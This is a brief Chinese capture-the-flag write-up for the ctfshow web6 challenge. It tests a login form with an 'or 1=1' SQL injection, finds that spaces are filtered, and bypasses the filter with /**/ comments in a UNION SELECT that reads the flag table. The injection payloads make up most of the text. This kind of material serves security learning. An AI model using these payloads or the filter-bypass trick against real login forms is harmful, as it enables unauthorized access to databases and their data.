ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
llxxyy卢21 分钟前
polar春季赛web题目
前端·web安全
xingxin3210 小时前
日志文件分析溯源(连接WebShell的IP地址)实验报告
安全·web安全·网络安全·php·文件上传
瘾大侠21 小时前
HTB - Kobold
网络·安全·web安全·网络安全
PyHaVolask21 小时前
SQL 注入实战:布尔盲注完整流程与 Python 脚本详解
web安全·渗透测试·sql注入·python脚本·布尔盲注
李白你好1 天前
一个综合性的Web安全学习平台
学习·安全·web安全
聚铭网络1 天前
聚铭网络参编!T/CCIA 005-2026《网络安全运营大模型参考架构》正式发布
网络·web安全·架构
暮色千里.5321 天前
多因素认证中的漏洞
网络·安全·web安全
小二·1 天前
企业级网络安全深度解析:从协议层到云原生的攻防实战与架构设计
安全·web安全·云原生
wanhengidc1 天前
企业如何有效利用高防服务器
运维·服务器·网络·安全·web安全·智能手机
乐6821 天前
CISCN2026半决赛wp
python·web安全·php